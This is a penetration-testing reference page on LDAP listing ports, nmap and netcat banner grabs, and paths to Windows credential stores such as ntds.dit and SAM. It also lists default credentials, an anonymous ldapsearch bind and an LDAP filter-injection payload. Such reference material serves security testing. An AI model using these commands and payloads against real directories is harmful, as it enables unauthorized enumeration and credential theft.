LDAP
LDAPLDAPSDirectory Services
LDAP (Lightweight Directory Access Protocol) accesses directory services. Unauthenticated binds allow anonymous queries to leak users, groups, and device information.
Ports
| Port | Protocol | Description |
|---|---|---|
| 389 | tcp/udp | LDAP |
| 636 | tcp | LDAPS |
| 3268 | tcp | Global Catalog |
| 3269 | tcp | Global Catalog SSL |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
C:\Windows\NTDS\ntds.dit | AD database with all password hashes |
C:\Windows\System32\config\SAM | Local SAM password hashes |
C:\Windows\System32\config\SYSTEM | System hive (boot key for hash decryption) |
C:\Windows\System32\config\SECURITY | Security policy and cached domain credentials |
%USERPROFILE%\AppData\Roaming\Microsoft\Credentials\ | Saved Windows credentials |
Default Credentials
| Username | Password | Context |
|---|---|---|
admin | admin | Generic admin account |
root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
CVE-2017-14175 | RCE | OpenLDAP RCE via BER decoding |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Null Bind | ldapsearch -x -h <target> -b "dc=domain,dc=com" | Anonymous LDAP query |
| LDAP Injection | ?user=admin*)(uid=*)) | LDAP filter injection |
Notes
Always start with full port scan: `nmap -sV -sC -p- <target>`.
Check for default credentials before brute-forcing.
Use service-specific NSE scripts: `nmap --script <service>-* -p <port> <target>`.
Remember to check both IPv4 and IPv6 if applicable.
Seen on
ShodanCensysFOFAZoomEye
References